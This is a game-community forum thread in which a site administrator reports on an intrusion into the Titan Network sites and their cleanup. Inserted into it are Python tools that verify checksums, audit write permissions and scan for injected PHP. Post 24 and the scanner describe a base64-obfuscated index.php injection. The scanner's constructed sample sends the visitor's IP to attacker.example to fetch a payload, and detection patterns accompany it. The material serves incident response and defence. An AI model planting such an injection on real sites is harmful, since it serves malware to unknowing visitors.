TonyV, Screenshot Spotter; Posts: 1977; Joined: Feb-10-2010
  1. Quote:
    Originally Posted by Blackops3lite View Post
    No more coh faces?
    It's not dead; I'm working on getting it restored to how it was. I will be honest, though, in saying that I don't plan on any significant updates or features to be added. We're working on a revamp, though, that will make a lot of this functionality kind of obsolete.

    In the meantime, I'm trying to knock out the other things on my To Do list so that we don't unnecessarily delay getting other functionality up and running. It's going to be at least next week before it even might be up. This is also why I haven't posted any updates in the last couple of days or so. The things I've been working on have been back-end stuff like getting log rotation working, getting our development repositories set up, and fixing minor bugs like the OuroPortal image database, the CIT XML feed, etc.

    This week, I'm going to try to get our stat tracking working again, and then this coming weekend, I'm going to the pummit. If you have comments, be they glowing compliments or scathing cuss-outs, you can meet me in person in Mountain View and have at it.

    Quote:
    Originally Posted by Blue Rabbit View Post
    My Sentinel doesn't even detect that the game is running. Kind of hard to have it verify badges that way.
    This is a known issue due to the recent UI change. GuyPerfect is working on an update. Because the UI changed and not just the data contained with it, it's going to require an application upgrade to fix it, not just an automagic manifest download. It will be fixed soon. (Not Soon™, which is the status of Faces.)
  2. Thanks for the report. There's definitely something wonky with the shared repository. I'll take a look at it.
  3. Quote:
    Originally Posted by Ang_Rui_Shen View Post
    The camera is high enough that you can't get a large full-character screenshot; if the rest of the character is the right size, the legs are cut off.
    Tap the End key or use the scroll wheel to zoom out a hair.
  4. Hey all, quick update. The Ouroboros Portal is back up. It's been cleaned, upgraded, and secured. Sorry for the delay in updates. Now on to the next items in my to do list. If anyone has any trouble or gets any errors, let me know.
  5. Quote:
    Originally Posted by GuyPerfect View Post
    I wanna be the man too!
    You're the Guy.
  6. Quote:
    Originally Posted by Obsidius View Post
    I've been talking about OuroPortal lately and was wondering what its order on the totem pole is. Obviously not a critical issue, just curious.
    This will probably be a not-too-hard thing to do, so I'll try to get it up and running mid-evening tonight. Faces is by far the hardest one to get moved over, that one will probably be at least another day or two out.
  7. Hey all, RedTomax/City of Data is back online and accessible. This one wasn't too hard, especially being a static site. It's cleaned and back up for your enjoyment. Please note that the RSS feeds are grossly out-of-date and don't work; that's not a new bug or a result of the cleaning or upgrades; it was broken a long time ago, and my focus is currently restoring the functionality we had, not fixing bugs that existed before. Also note that the data isn't up-to-date, either. Getting it up-to-date is another effort that will be addressed later.
  8. Hmm... Good question. If it's based on the CodeIgniter framework, it will probably be tomorrow or, at the latest, Wednesday. If it's not, I'll try to get it restored tonight. I don't think it is, so I'm hoping the latter.
  9. You were watching the football game, weren't you! And no, I'm not trying to make a joke about the cheerleader outfit. I just mean that that is the only thing I've watched today, and I saw the same commercial.
  10. Woot, we have site uppage! Please read the update at the top for more info.

    tl;dr version: CIT, avatars, and the Mids' and Sentinel repository are all up now, report any issues here!
  11. Quote:
    Originally Posted by The_Spad_EU View Post
    TonyV, any chance you could post the MD5 for the current Mids' installer, just so that anyone who wants to can check it against the one they download off my server?

    I'm sure most people won't care, but I'd like to provide the option for those who do.

    Ta.
    You bet. It is:
    fd8f4946e53ef9a466674f4f160b0eb7 MXDSetup1-952.exe

    I've run both the latest version that was posted on our site and the version that is mirrored above through a checksum, and compared it to a known good version that I had from Diellan's and DeProgrammer's updates to the repository, and they all match up.

    Anyone who wants to verify the integrity of their file can snag a copy of a file checksummer utility from Microsoft from their web site.

    If you want to verify that your installed copy of Mids is okay, here's the checksum of executable files within the distribution:
    47f54527bc44c4dc98845da86e7387b0 Hero Designer.exe
    0b3b4e8d1de31f844e466d61cf7937b5 ICSharpCode.SharpZipLib.dll
    e1ee2d27c6f6f105a7ba21387e1cbf07 midsControls.dll
    80e41408f6d641dc1c0f5353a0cc8125 zlib1.dll
    d993e1da5d1c5cda8d8daa096eecced4 Uninstall.exe

    Just to stress the point: The Mids download was not compromised on the site. Barring infection in some other manner, downloading Mids, installing it, and running it would not have affected your computer.
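    As an added example (not code from this post, from Mids, or from the Titan Network), here is a small Python verifier for a list in the form posted above: one MD5 hex digest, a single space, then the file name. The parser splits each line at the first space only, because a name such as "Hero Designer.exe" itself contains a space. The download directory it builds is constructed for the demonstration; against a real download you would call verify_tree on the folder holding the files with parse_md5_list(PUBLISHED_MD5). Two caveats the post does not spell out: a digest only proves the file matches what the poster had, so fetch the digest from somewhere other than the mirror that served the file, and MD5 collisions are cheap today, so a publisher starting fresh should list SHA-256 (hashlib.sha256 is a drop-in replacement below).

```python
import hashlib
import os
import tempfile

# Published list copied from the post above: "<md5 hex> <file name>" per line.
PUBLISHED_MD5 = """\
fd8f4946e53ef9a466674f4f160b0eb7 MXDSetup1-952.exe
47f54527bc44c4dc98845da86e7387b0 Hero Designer.exe
0b3b4e8d1de31f844e466d61cf7937b5 ICSharpCode.SharpZipLib.dll
e1ee2d27c6f6f105a7ba21387e1cbf07 midsControls.dll
80e41408f6d641dc1c0f5353a0cc8125 zlib1.dll
d993e1da5d1c5cda8d8daa096eecced4 Uninstall.exe
"""


def parse_md5_list(text):
    """Return {file name: md5 hex} from the posted format; reject malformed digests."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")  # first space only: names may contain spaces
        digest = digest.lower()
        if len(digest) != 32 or set(digest) - set("0123456789abcdef"):
            raise ValueError(f"malformed MD5 entry: {line!r}")
        expected[name.strip()] = digest
    return expected


def md5_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so a large installer never has to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_tree(root, expected):
    """Compare every listed file under root against its published digest."""
    results = {}
    for name, digest in expected.items():
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
        elif md5_of_file(path) == digest:
            results[name] = "OK"
        else:
            results[name] = "MISMATCH"
    return results


def build_sample_tree():
    """Constructed stand-in for a download directory: one intact file, one with a
    byte appended after its digest was recorded, and one that never arrived."""
    root = tempfile.mkdtemp(prefix="mids-verify-")
    original = b"MZ constructed installer bytes, not the real Mids binary"
    for name in ("intact.exe", "tampered.exe"):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(original)
    expected = {name: hashlib.md5(original).hexdigest()
                for name in ("intact.exe", "tampered.exe", "missing.exe")}
    with open(os.path.join(root, "tampered.exe"), "ab") as fh:
        fh.write(b"\x90")  # a single appended byte is enough to change the digest
    return root, expected


if __name__ == "__main__":
    root, expected = build_sample_tree()
    for name, status in verify_tree(root, expected).items():
        print(f"{status:9} {name}")
    print(parse_md5_list(PUBLISHED_MD5)["Hero Designer.exe"])
```

    On Windows without any extra tool, `certutil -hashfile <file> MD5` prints the same digest the script computes, so the two can be cross-checked by hand.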
  12. Just a quick update that we're keeping the sites down for another day while we plug the hole we've identified as the likely exploit vector. We have strong reason to believe that this was the butt-kicker. We found a "smoking gun" in the Faces filesystem, along with some other oddities that we're using for diagnostic and research purposes. Needless to say, we're going to be patching every installation of CodeIgniter we have before turning stuff back on.

    Note that the sites that are currently up, which include our forums, the Paragon Wiki, and HeroStats site, do not use CodeIgniter and are not vulnerable to the attack that was used. Also, we've significantly locked down the permissions on the directories so that even the web service account doesn't have write access to pull off this kind of thing again.

    As a side effect, to be honest, there might be a few glitches because scripts don't have the same access to the system that they used to. If you notice any oddities or get any errors, let us know and we'll try to get them fixed.
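    The lockdown described above raises the question a practitioner wants answered before flipping the sites back on: which paths can the web service account still write to? As an added example (not code from the post or from the Titan Network), here is a Python audit that walks a document root and reports anything the given uid/gids could modify, with an allowlist for the upload and cache directories that legitimately need writes (the "glitches" the post warns about are usually exactly those). The uid, gids and document root here are constructed; on a real server you would take them from pwd.getpwnam("www-data") and os.getgrouplist. It reads mode bits only, so POSIX ACLs set with setfacl are not reflected and would need getfacl to check.

```python
import os
import stat
import tempfile


def writable_by(st, uid, gids):
    """Could an account with this uid and these gids write the object described by st?"""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_tree(root, uid, gids, allow=()):
    """List paths under root (relative) that the account could modify.
    `allow` names subtrees that are meant to be writable; they are skipped."""
    allowed = {os.path.normpath(os.path.join(root, a)) for a in allow}
    flagged = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if any(path == a or path.startswith(a + os.sep) for a in allowed):
                continue
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # mode bits on the link itself are not enforced on Linux
            if writable_by(st, uid, gids):
                flagged.append(os.path.relpath(path, root))
    return sorted(flagged)


def build_sample_docroot():
    """Constructed document root: a read-only index.php, a world-writable
    config.php left behind by a sloppy install, a group-writable uploads
    directory, and a cache directory that is meant to be writable."""
    root = tempfile.mkdtemp(prefix="docroot-")

    def put(rel, mode, is_dir=False):
        path = os.path.join(root, rel)
        if is_dir:
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("<?php // constructed placeholder\n")
        os.chmod(path, mode)

    put("index.php", 0o644)
    put("config.php", 0o666)
    put("uploads", 0o775, is_dir=True)
    put("cache", 0o775, is_dir=True)
    put("cache/page.html", 0o664)
    return root


if __name__ == "__main__":
    root = build_sample_docroot()
    # Hypothetical web service account: a uid other than the current user that
    # shares the group owning the files, as a shared-group deployment would.
    web_uid = os.getuid() + 10000
    web_gids = {os.stat(os.path.join(root, "uploads")).st_gid}
    for rel in audit_tree(root, web_uid, web_gids, allow=("cache",)):
        print("writable by web account:", rel)
```

    Run it once with an empty allowlist to see everything, then add only the directories the application documents as needing writes; anything left over is either a leftover from the old permissions or a candidate for the kind of index.php rewrite the post describes.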
  13. This is kind of odd, and I wanted to address it before any rumors spread too far or wide, especially given our activities this week. Someone PMed me today that there was chatter in-game that the Paragon Wiki is going to shut down in a year, according to the guy that created it. I don't know who they were referring to, but in reality, that would be me. I started the site, I currently own all of the domains associated with the Titan Network, and I am the lessee of the server on which all Titan Network sites--including the Paragon Wiki--reside.

    The truth of the matter is that this has never even been mentioned in passing as a topic of conversation. Not by me, not among any of our admins. I have no idea where someone may have gotten this idea, but it is 100% not true. If I put some gray matter to it, I could probably contrive some bizarre circumstances under which the sites might not still be up in a year (or two, or five, or twenty...), but it's never really occurred to me to try.

    Either someone's making stuff up to have a good laugh on folks, or there was a really bizarre misunderstanding. Maybe someone was talking about another site or something, I don't know. I haven't heard of any other sites that are worried about shutting down.

    So if you see anyone making this odd claim, please point them to this thread, or just tell them to search for TonyV's post with the word cwm in it, a Welsh word for a bowl-like valley (and an awesome play to make your opponent challenge your word and snag you an extra turn in Scrabble™), and which I will only use in this post in order to make it easy to find via a quick search.

    Okay, now that that is taken care of, I'm going to go play my crwth for a while.
  14. Quote:
    Originally Posted by Obsidius View Post
    If you haven't donated to the Titan Network yet, I don't know why TonyV and the gang are busting their humps for you (and using vacation time to do it, too!)
    Now now, don't go guilting people into donating. Especially since...

    Quote:
    Originally Posted by Demobot View Post
    I'd love to see people who get PAID to do this sort of thing do a better job than TonyV has. Keep up the good work Tony!
    If I were getting paid for this, I'd like to hope that I would have done a better job of making sure all of our software was up-to-date, possibly preventing this whole mess to begin with. Truth be known, I'm feeling a bit guilty over it, since keeping current is normally a big emphasis of mine to maintain security of the system.

    Still, things have been pretty crazy on all fronts at the Titan Network lately, what with changes to the game coming fast and furious. Everyone loves the pace at which new stuff is coming out these days--including us!--but I won't lie, sometimes it's like, "Aw, come on guys! Give us some time to breathe!"

    So I admit it, I let something slip that really shouldn't have slipped, and we got bitten for it. For anyone else running a web site out there, whether it's a hobby like this one or a more professional endeavor, I can't pound this into your skull enough. Make sure you stay on top of patches and updates! Not just the big stuff like the OS, web server, database, and scripting language (though those are certainly important), but also every library, packaged software, and coding framework you use, too.

    Incidentally, that's also one thing we'll be working on: making sure that only our live, up-to-date sites are hosted on the server. No more development stuff, and no more deprecated sites. Keeping the dozens of things in the live environment current is hard enough without having to worry about a development site being hacked; it doesn't make sense to needlessly expose ourselves because that old forgotten copy of the PC Free Press that no one looks at is still hanging out there using an ancient version of Mambo. We'll still have dev and test sites, probably hosted on VMs at my house, and I'll try to host those old deprecated sites somewhere (possibly on a dirt cheap shared web host or something), but not where it could compromise our active sites.
  15. Re: Hero Skin Borked

    Upon learning of this news, Snaptooth responded:

    (Okay, I'll stop now.)
  16. Re: Hero Skin Borked

    Quote:
    Originally Posted by Zwillinger View Post
    There's currently some issues with the Hero (blue) skin on the forums.

    We sincerely hope it gets corrected quickly.
  17. First of all, I have to say a HUGE "Thank you!" to everyone expressing support. As I've said before, it really does mean a lot. These things are very NOT fun to deal with, and I appreciate everyone bearing with us and sending good vibes our way as we not only restore service, but actually make things better. Some folks have even been sending donations, which I really appreciate, since we're double-dipping on a second VPS this month to have the ability to move audited stuff over as it gets cleaned and verified instead of trying to move everything at once and clean-as-we-go. I've also been getting some PMs from folks, and I will reply, I promise, as soon as the sites are back up and I can take some time to do it right.

    Second of all, as posted in the update in the OP, we got the Titan Forums updated and restored. There are still some login/password issues so you might not have full access just yet, but when we get the main site back up (expected sometime tomorrow night Eastern time), you'll be able to reset your Titan Key to sync everything up and regain access. I'll post more details as I get them.

    Quote:
    Originally Posted by SaintNicster View Post
    Yeah, I'm guessing that it was probably something with the copy of SMF. Last I saw, it was running 1.1.10, though there may have been more components that were up-to-date.
    I'm almost certain this is what bit us. I'm not 100% sure, and I'm still looking for the "smoking gun" on the server to definitively say, "Yup, that's it!" (Which will really have to wait at least another day or two until I get everything moved over, configured, and up and running.) But of what research I've been able to do, this is by far the most likely candidate vector of attack. It's also why I put such heavy emphasis on getting the old forums upgraded first, even at the expense of losing some of the customization.
  18. Quote:
    Originally Posted by peterpeter View Post
    I think they also need to fix the bug which causes text to come out in random order. Unless it's just me, but it seems like a lot of spawns that are supposed to have some dialog get the lines in the wrong order.
    Memento: The MMORPG.
  19. Quote:
    Originally Posted by QuarriosSoul View Post
    The paragonwiki.com link isn't working but the wiki.cohtitan.com one is.
    It's DNS propagation. We changed the IP address of the server, so until your DNS server updates with the new address, you'll still be hitting against the old server that's not servicing requests. The TTL is a day, but really, it shouldn't take that long. I noticed around 15 minutes ago that it had just hit Google's public DNS servers, so it is getting out there.
  20. Quote:
    Originally Posted by Intrinsic View Post
    I take it from your description that a browser plugin like Noscript would block the javascript payload from running, even if the plugin allows scripts from the cohtitan.com domain to execute, correct?
    Absolutely. Anyone with NoScript installed is literally at zero risk of being affected by this. (Unless you've whitelisted the malware domain, which I really hope you haven't.) Whitelisting the cohtitan.com sites is fine, too; the payload was delivered by a remote server, not the Titan server.
  21. Quote:
    Originally Posted by Ideon View Post
    You could always visit the wikia version... derp :3
    /e noooo
  22. Quote:
    Originally Posted by CuppaManga View Post
    Based on your analysis, TonyV, I sent you a PM that I hope will get you out of the woods.
    Muchas gracias. I read it, and I'll process it as soon as I can. Sounds reasonable to me. I did check the cron jobs earlier and I don't see anything, but I still haven't finished a deep dive to find out what did make the changes. That's way up the priority chain on my list, after getting at least a maintenance page deployed.
  23. That's one of the things that we have to check to make sure it's clean before bringing everything back up. I'll try to get someone on checking the downloadable copy of Mids to make sure it wasn't compromised and posting it back up for download shortly.
  24. Quote:
    Originally Posted by gameboy1234 View Post
    If you can, post some analysis of what the attacker did. I'm always interested to see these things explained. Helps the rest of us with our security.
    The nuts and bolts of it is that something has rewritten a whole bunch of index.php files, including most that run the core functionality of all of our sites, to include the following line at the top:
    echo (base64_decode('ZXJy[bunches more gibberish]0KfQ=='));

    When you decode that, you get a PHP function that:

    - Turns off error reporting,
    - Fetches the IP address of who's accessing the page,
    - Fetches the user agent (UA) of who's accessing the page and compares it against a list of known security sites and webcrawlers,
    - If it's not in the list of UAs, it does a cURL fetch of a javascript payload from a remote distribution site. The URL is defined as:
    'http://[scum domain omitted]/index.php?go=1&ip='.$ip

    So it's sending the IP address of the user who is accessing the page. Depending on that IP address, the payload may or may not be delivered. When I put my own address in, it's not. When I poked around a little bit, I was able to find an IP that did deliver the payload, which I copied for further analysis as soon as I get a chance.

    There are a couple of interesting things that I'm trying to figure out. For one thing, the modification datestamps of the index.php files are unchanged. That means that whatever script made the modifications either 1) is running at a very low filesystem level, or 2) took some pains to save the modification date and change it back to what it was originally.

    Right now, my efforts are being split in three directions. First, I'm on shift for my day job and, as my luck is going today, got sucked into a teleconference as soon as I logged on two hours ago, which means that my other efforts are currently being severely hampered. Second, I'm setting up a second server that will likely replace our existing Titan Network server that has been completely staged from scratch and onto which sanitized copies of our sites will be moved. Third, I'm trying to get to the bottom of how this happened so that I can prevent it from happening again and, if possible, report the incident to law enforcement.
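    The injection shape described above (a base64 literal handed to base64_decode() at the top of index.php, decoding to a stage that silences errors, filters by user agent, and fetches a second stage by IP) is easy to sweep a document root for. As an added example (not the post's code and not anything from the Titan Network or CodeIgniter), here is a Python scanner that finds such calls, decodes the literal, and labels the behaviours it contains. It assumes the call keywords beyond the quoted `echo` (eval, assert are the usual executing forms), the indicator strings, and a constructed sample stage whose domain is a placeholder, not the one the post omitted. It also addresses the timestamp puzzle in the post: a tool that resets mtime with utime() cannot avoid the kernel updating ctime on that very call, so a ctime well after mtime is itself evidence that the file was touched after its displayed date; only raw device writes or a clock change defeat that check. Obfuscators vary (gzinflate, str_rot13, chr() concatenation), so treat this as one signature, and compare the tree against a known-good copy or distribution checksums as well.

```python
import base64
import os
import re
import tempfile
import time

# The injection shape from the post: a PHP call handing a base64 literal to
# base64_decode(). 'echo' is what the post quotes; 'eval' and 'assert' are the
# executing variants commonly seen in the same kind of injection (an assumption).
B64_CALL = re.compile(
    r"\b(eval|echo|assert)\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]",
    re.IGNORECASE,
)

# Behaviours the post found after decoding, keyed by a string that reveals each.
INDICATORS = {
    "error_reporting(0)": "turns off error reporting",
    "REMOTE_ADDR": "reads the visitor IP address",
    "HTTP_USER_AGENT": "reads the visitor user agent",
    "curl_init": "fetches a remote payload with cURL",
    "go=1&ip=": "passes the visitor IP to the distribution site",
}


def decode_stage(b64_text):
    """Decode the literal; return None if it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", b64_text), validate=True)
    except ValueError:
        return None
    return raw.decode("latin-1")


def scan_source(source):
    """Return one finding per base64-wrapped call in a PHP source string."""
    findings = []
    for match in B64_CALL.finditer(source):
        decoded = decode_stage(match.group(2)) or ""
        findings.append({
            "call": match.group(1).lower(),
            "indicators": [why for needle, why in INDICATORS.items() if needle in decoded],
            "decoded_head": decoded[:60],
        })
    return findings


def mtime_was_reset(path, slack=5.0):
    """utime() can put mtime back, but the kernel bumps ctime on that call, so a
    ctime well after mtime means the file changed after its displayed date."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack


def scan_tree(root):
    """Walk a document root; report PHP files with injected stages or reset mtimes."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                findings = scan_source(fh.read())
            reset = mtime_was_reset(path)
            if findings or reset:
                report[os.path.relpath(path, root)] = {"injections": findings, "mtime_reset": reset}
    return report


# Constructed stage mimicking the behaviour the post describes; the domain is a
# placeholder, not the one the post omitted.
SAMPLE_STAGE = (
    "error_reporting(0);\n"
    "$ip = $_SERVER['REMOTE_ADDR'];\n"
    "$ua = $_SERVER['HTTP_USER_AGENT'];\n"
    "if (!preg_match('/googlebot|bingbot|nessus/i', $ua)) {\n"
    "  $ch = curl_init('http://attacker.example/index.php?go=1&ip=' . $ip);\n"
    "  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n"
    "  echo curl_exec($ch);\n"
    "}\n"
)


def build_sample_tree():
    """Constructed docroot: one clean index.php and one with the stage prepended
    and its mtime pushed back a day, as the post says happened on the server."""
    root = tempfile.mkdtemp(prefix="phpscan-")
    os.mkdir(os.path.join(root, "clean"))
    os.mkdir(os.path.join(root, "hacked"))
    with open(os.path.join(root, "clean", "index.php"), "w") as fh:
        fh.write("<?php\nrequire 'system/bootstrap.php';\n")
    b64 = base64.b64encode(SAMPLE_STAGE.encode()).decode()
    hacked = os.path.join(root, "hacked", "index.php")
    with open(hacked, "w") as fh:
        fh.write(f"<?php\necho (base64_decode('{b64}'));\nrequire 'system/bootstrap.php';\n")
    old = time.time() - 86400
    os.utime(hacked, (old, old))  # mtime back-dated; ctime still records now
    return root


if __name__ == "__main__":
    for rel, hit in scan_tree(build_sample_tree()).items():
        print(rel, "mtime reset:", hit["mtime_reset"])
        for finding in hit["injections"]:
            print("  ", finding["call"], "->", ", ".join(finding["indicators"]))
```

    On the live server the equivalent one-liner is `find /var/www -name '*.php' -newerct "$(date -d '2 days ago')"` against ctime, which catches the back-dated files the mtime-based listing missed; the Python version adds the decode step so the hits can be triaged without opening each file.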
  25. Quote:
    Originally Posted by Twoflower View Post
    I want to avoid rumor/scaremongering, but what does this mean for someone who just visited the site during the compromised period? Should I be worrying about viruses?

    I run ZoneAlarm, AVG Free, and am using Firefox, if that helps. I'm gonna start a full computer scan right now, to be sure.
    With that profile, I wouldn't think so. The full scan certainly won't hurt though, and I would recommend that anyone who has visited the sites in the past 18 hours or so (since around 17:00 ET/21:00 UTC) to run a scan just in case.